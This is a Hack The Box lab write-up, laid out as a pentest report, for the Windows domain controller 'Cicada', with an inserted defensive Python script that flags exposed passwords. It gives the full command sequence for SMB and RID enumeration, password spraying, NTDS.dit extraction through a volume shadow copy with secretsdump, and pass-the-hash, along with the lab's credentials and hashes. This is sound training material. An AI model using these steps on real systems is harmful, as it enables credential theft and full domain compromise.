
2026-05-21 • htb • easy • windows

HTB - Cicada

Guest SMB access exposes an HR share containing a default password in a staff notice. RID brute-force enumerates domain users, and a password spray yields initial access as michael.wrightson. LDAP user enumeration reveals a second password stored in david.orelious's account description. His access to the DEV share exposes a PowerShell backup script containing emily.oscars's credentials. Emily's membership in Remote Management Users grants a WinRM foothold. Her Backup Operators membership is abused to snapshot the C volume via VSS, extract NTDS.dit, and dump the Administrator NTLM hash for a pass-the-hash login.

Tags: smb-enumeration, rid-brute, password-spray, password-in-description, backup-operators, vss-shadow-copy, ntds-dump, pass-the-hash
Tools: nmap, netexec, smbclient, ldapsearch, evil-winrm, secretsdump, bloodhound

Hack The Box — Cicada

Easy | Windows | Hack The Box


Field          Value
-----          -----
Report Date    21 May 2026
Assessed By    RobInTheHood
Target IP      10.129.231.149
Hostname       CICADA-DC
Domain         cicada.htb

Table of Contents

  1. Executive Summary
  2. Scope
  3. Methodology
  4. Attack Chain Summary
  5. Findings
  6. Proof of Access
  7. Credentials Discovered
  8. Impact Assessment
  9. Remediation Summary
  10. Key Takeaways
  11. Tools Used
  12. Disclaimer

1. Executive Summary

This report documents the compromise workflow for the Hack The Box machine Cicada. The objective was to obtain full system-level access in an authorised lab environment and document the attack path with reproducible evidence.

An SMB share accessible by the guest account contains an HR notice that discloses a default onboarding password. RID brute-force enumerates all domain user accounts, and a password spray identifies michael.wrightson as the recipient. Authenticated LDAP enumeration reveals a plaintext password stored in david.orelious’s account description field. His privileges expose the DEV share, which holds a PowerShell backup script containing the credentials of emily.oscars. Emily’s membership in the Remote Management Users group allows a WinRM connection via evil-winrm. Her membership in Backup Operators is then abused to create a VSS shadow copy of the C volume, extract NTDS.dit, and dump the domain Administrator NTLM hash using secretsdump. A pass-the-hash login completes the full domain compromise.


2. Scope

Field               Value
-----               -----
Target IP           10.129.231.149
Hostname            CICADA-DC
Domain              cicada.htb
Operating System    Windows Server 2022 Build 20348
Machine Rating      Easy
Environment         Hack The Box — Authorised Training Lab
Assessment Date     21 May 2026
Assessor            RobInTheHood

3. Methodology

  • Reconnaissance — service discovery and external attack-surface mapping
  • Enumeration — credential, configuration, and trust-path analysis
  • Exploitation — initial access through validated vulnerability paths
  • Lateral Movement — privilege pivoting and cross-context execution
  • Privilege Escalation — full compromise to root/SYSTEM context
  • Post-Exploitation — proof collection and impact-oriented validation

4. Attack Chain Summary

Phase                  Technique                                                                  MITRE ATT&CK
-----                  ---------                                                                  ------------
Recon                  Nmap — DNS, Kerberos, LDAP, SMB surface mapped                             T1046
Enumeration            Guest SMB → HR share → default password in staff notice                    T1135
Enumeration            RID brute-force → domain user list                                         T1087.002
Initial Access         Password spray → michael.wrightson authenticated                           T1110.003
Enumeration            LDAP user dump → password in david.orelious description field              T1552.001
Lateral Movement       DEV share → Backup_script.ps1 → emily.oscars credentials                   T1552.001
Initial Foothold       WinRM as emily.oscars → user flag                                          T1021.006
Privilege Escalation   Backup Operators → VSS snapshot → NTDS.dit extraction → Admin NTLM hash    T1003.003 · T1550.002

5. Findings

F-01 — Technical Walkthrough

Reconnaissance

nmap -sC -sV 10.129.231.149 -oN nmap.txt

Port       Service
----       -------
53/tcp     DNS
88/tcp     Kerberos
135/tcp    MSRPC
139/tcp    NetBIOS-SSN
389/tcp    LDAP
445/tcp    SMB2

The presence of Kerberos (88) and LDAP (389) alongside SMB confirms a Domain Controller. The combination of a guest-accessible SMB and a writable IPC$ makes unauthenticated enumeration the natural starting point.


Enumeration — SMB Guest Access

Initial SMB enumeration with a null/guest session reveals the share layout:

nxc smb 10.129.231.149 -u 'guest' -p '' --shares
Share       Permissions     Remark
-----       -----------     ------
ADMIN$                      Remote Admin
C$                          Default share
DEV
HR          READ
IPC$        READ            Remote IPC
NETLOGON                    Logon server share
SYSVOL                      Logon server share

The HR share is readable without credentials. Connecting to it reveals a staff notice:

smbclient //cicada.htb/HR -U ''
smb: \> ls
  Notice from HR.txt   A   1266   Wed Aug 28 13:31:48 2024

The notice contains a domain-wide default onboarding password:

New Hire
Your default password is: Cicada$M6Corpb*@Lp#nZp!8

A password without a username calls for user enumeration before any authentication can be attempted.


Enumeration — RID Brute-Force

nxc smb 10.129.231.149 -u 'guest' -p '' --rid-brute 2>/dev/null | grep "SidTypeUser"
500: CICADA\Administrator
501: CICADA\Guest
502: CICADA\krbtgt
1000: CICADA\CICADA-DC$
1104: CICADA\john.smoulder
1105: CICADA\sarah.dantelia
1106: CICADA\michael.wrightson
1108: CICADA\david.orelious
1601: CICADA\emily.oscars

Initial Access — Password Spray

The recovered default password is tested against the enumerated user list via LDAP authentication:

ldapsearch -x -H ldap://10.129.231.149 -b "DC=cicada,DC=htb" \
  -D "michael.wrightson@cicada.htb" -w 'Cicada$M6Corpb*@Lp#nZp!8'

Authentication succeeds for michael.wrightson, confirming the credential pair:

michael.wrightson : Cicada$M6Corpb*@Lp#nZp!8

Enumeration — Password in Account Description

With valid credentials, authenticated LDAP enumeration surfaces all domain users and their description fields:

nxc ldap 10.129.231.149 -u "michael.wrightson@cicada.htb" \
  -p 'Cicada$M6Corpb*@Lp#nZp!8' -k --users
-Username-          -Last PW Set-       -BadPW-  -Description-
Administrator       2024-08-26 16:08:03 0        Built-in account for administering...
Guest               2024-08-28 13:26:56 0        Built-in account for guest access...
krbtgt              2024-03-14 07:14:10 0        Key Distribution Center Service Account
john.smoulder       2024-03-14 08:17:29 0
sarah.dantelia      2024-03-14 08:17:29 1
michael.wrightson   2024-03-14 08:17:29 0
david.orelious      2024-03-14 08:17:29 0        Just in case I forget my password is aRt$Lp#7t*VQ!3
emily.oscars        2024-08-22 17:20:17 0

david.orelious has stored his password in the description attribute, a field world-readable by any authenticated domain user:

david.orelious : aRt$Lp#7t*VQ!3

Lateral Movement — DEV Share and Backup Script

Enumerating SMB shares with David’s credentials reveals access to the DEV share:

nxc smb 10.129.231.149 -u 'david.orelious@cicada.htb' -p 'aRt$Lp#7t*VQ!3' -k --shares
Share       Permissions
-----       -----------
DEV         READ
HR          READ
IPC$        READ
NETLOGON    READ
SYSVOL      READ

smbclient //cicada.htb/DEV -U 'david.orelious@cicada.htb' --use-kerberos
smb: \> ls
  Backup_script.ps1   A   601   Wed Aug 28 13:28:22 2024

The PowerShell backup script contains hardcoded credentials:

$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)

emily.oscars : Q!3@Lp#M6b*7t*Vt
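As an added defensive example (not part of the report), the following Python audit flags the two credential-exposure patterns found above: a password written into an AD description attribute, parsed from an `nxc ldap --users`-style listing, and a string literal passed to ConvertTo-SecureString -AsPlainText in a PowerShell script. Both inputs are constructed samples modelled on the report's output.

```python
from __future__ import annotations
import re

# Constructed sample in the shape of `nxc ldap --users` output (not live data).
SAMPLE_USERS = """\
-Username-          -Last PW Set-       -BadPW-  -Description-
Administrator       2024-08-26 16:08:03 0        Built-in account for administering...
john.smoulder       2024-03-14 08:17:29 0
david.orelious      2024-03-14 08:17:29 0        Just in case I forget my password is aRt$Lp#7t*VQ!3
emily.oscars        2024-08-22 17:20:17 0
"""

# Constructed PowerShell fragment in the style of Backup_script.ps1.
SAMPLE_SCRIPT = '''\
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
'''

# One listing row: user, "YYYY-MM-DD HH:MM:SS", bad-password count, optional description.
USER_LINE = re.compile(
    r"^(?P<user>\S+)\s+(?P<pwset>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\s+"
    r"(?P<badpw>\d+)\s*(?P<desc>.*)$"
)
# Words that usually accompany a password written into a free-text field.
PASSWORD_HINT = re.compile(r"\b(password|passwd|pwd|pass)\b", re.IGNORECASE)
# A quoted literal handed to ConvertTo-SecureString with -AsPlainText on the same line.
PS_PLAINTEXT = re.compile(
    r'ConvertTo-SecureString\s+(?P<q>["\'])(?P<secret>.*?)(?P=q)[^\n]*-AsPlainText',
    re.IGNORECASE,
)


def find_description_secrets(listing: str) -> list[tuple[str, str]]:
    """Return (username, description) pairs whose description mentions a password."""
    hits = []
    for line in listing.splitlines():
        m = USER_LINE.match(line)
        if not m:
            continue  # header row or unrelated output
        desc = m.group("desc").strip()
        if desc and PASSWORD_HINT.search(desc):
            hits.append((m.group("user"), desc))
    return hits


def find_script_secrets(script: str) -> list[str]:
    """Return every literal converted to a SecureString from plaintext."""
    return [m.group("secret") for m in PS_PLAINTEXT.finditer(script)]
```

Run against a real export, the same two functions give a list of accounts whose description field needs clearing and a list of scripts that should move their secret into a managed service account or a vault.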

Foothold — WinRM as emily.oscars

Emily’s SMB share permissions confirm elevated access:

nxc smb 10.129.231.149 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt' -k --shares
Share       Permissions
-----       -----------
ADMIN$      READ
C$          READ,WRITE
HR          READ
IPC$        READ
NETLOGON    READ
SYSVOL      READ

BloodHound collection confirms Emily is a member of Remote Management Users, enabling a WinRM session:

evil-winrm -i 10.129.231.149 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'
Evil-WinRM shell v3.7

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents>

User Flag

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> dir "C:/Users/emily.oscars.CICADA/Desktop/"

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---         5/21/2026  10:08 PM             34 user.txt

USER FLAG : 809b8b7f6b65957f74ffa408194126ff

Privilege Escalation — Backup Operators → NTDS.dit Extraction

BloodHound identifies Emily as a member of Backup Operators. This group grants SeBackupPrivilege and SeRestorePrivilege; the former lets a process read any file regardless of its DACL, which is a well-known path to extracting NTDS.dit via Volume Shadow Copy.

Step 1 — Create a VSS shadow copy using a diskshadow script:

set verbose on
set metadata C:\Windows\Temp\meta.cab
set context persistent
begin backup
add volume C: alias myAlias
create
expose %myAlias% Z:
end backup
exit

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> upload /workspace/shadow.txt .
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> diskshadow /s shadow.txt

The shadow copy is exposed as Z:\.

Step 2 — Copy NTDS.dit from the shadow:

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> robocopy /b Z:\Windows\NTDS\ C:\Windows\Temp\ ntds.dit

Step 3 — Export SAM and SYSTEM hives:

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> reg save HKLM\SYSTEM SYSTEM.SAV
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> reg save HKLM\SAM SAM.SAV

Step 4 — Download and dump offline:

secretsdump -sam SAM.SAV -system SYSTEM.SAV -ntds ntds.dit LOCAL
[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::

Root Flag — Pass-the-Hash

evil-winrm -i 10.129.231.149 -u 'Administrator' -H "2b87e7c93a3e8a0ea4a581937016f341"
Evil-WinRM shell v3.7

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator> type "C:/Users/Administrator/Desktop/root.txt"
4a9b681568929984ac530fdc12d3521f

6. Proof of Access

Level    Evidence
-----    --------
User     809b8b7f6b65957f74ffa408194126ff
Root     4a9b681568929984ac530fdc12d3521f

7. Credentials Discovered

Account             Secret                              Type               Source
-------             ------                              ----               ------
michael.wrightson   Cicada$M6Corpb*@Lp#nZp!8            Domain password    Default onboarding password in HR share notice
david.orelious      aRt$Lp#7t*VQ!3                      Domain password    Plaintext in LDAP description attribute
emily.oscars        Q!3@Lp#M6b*7t*Vt                    Domain password    Hardcoded in Backup_script.ps1 on DEV share
Administrator       2b87e7c93a3e8a0ea4a581937016f341    NTLM hash          NTDS.dit dump via VSS + secretsdump

8. Impact Assessment

Successful exploitation resulted in full domain compromise through a chain of credential exposures rather than any single high-severity vulnerability. Each step was self-contained and relied entirely on misconfiguration: a default password broadcast in plaintext over SMB, a domain account self-documenting its own password in a world-readable field, a script storing credentials in cleartext on a network share, and a group membership that enables offline extraction of the entire domain credential store. No exploit code was required at any stage.


9. Remediation Summary

Priority   Action
--------   ------
Critical   Enforce unique, per-user initial passwords delivered out-of-band (e.g., encrypted email or in-person); never broadcast a domain-wide default password over a network share.
Critical   Enforce an AD policy that prohibits use of description, info, or any user-readable attribute for password storage; implement LAPS for local admin credentials.
Critical   Remove hardcoded credentials from scripts; use managed service accounts or a secrets manager (e.g., HashiCorp Vault, Windows Credential Manager with DPAPI).
High       Audit Backup Operators membership; the group effectively grants read access to all files on the system. Remove users who do not require offline backup duties.
High       Restrict SMB guest access; guest enumeration should return no shares and no user information.
Medium     Enable SMB signing to prevent relay attacks against the same infrastructure.

10. Key Takeaways

  • A single shared default onboarding password across all new hires, stored on an anonymous-readable SMB share, collapses the entire initial-access phase to one file read.
  • The LDAP description attribute is world-readable by any authenticated domain user; it is regularly abused for credential storage and should be treated as a public field.
  • Backup Operators is a high-privilege group that receives little scrutiny compared to Domain Admins — yet it provides a direct, documented path to full domain credential extraction via VSS.
  • Credential chaining (HR notice → michael → david’s description → emily’s script → Administrator hash) is characteristic of real-world Active Directory environments where each account is slightly more privileged than the last.

11. Tools Used

Tool            Purpose
----            -------
nmap            Port and service discovery
netexec (nxc)   SMB share enumeration, RID brute-force, LDAP user dump, BloodHound collection
smbclient       Manual share browsing and file retrieval
ldapsearch      Authenticated LDAP query for initial credential validation
BloodHound      AD relationship analysis — group memberships and attack paths
evil-winrm      WinRM foothold and pass-the-hash authentication
diskshadow      VSS shadow copy creation for NTDS.dit access
secretsdump     Offline NTLM hash extraction from NTDS.dit + SYSTEM hive

12. Disclaimer

This assessment was performed exclusively in an authorised Hack The Box training environment for educational and portfolio purposes.


End of Report — Cicada | RobInTheHood | 21 May 2026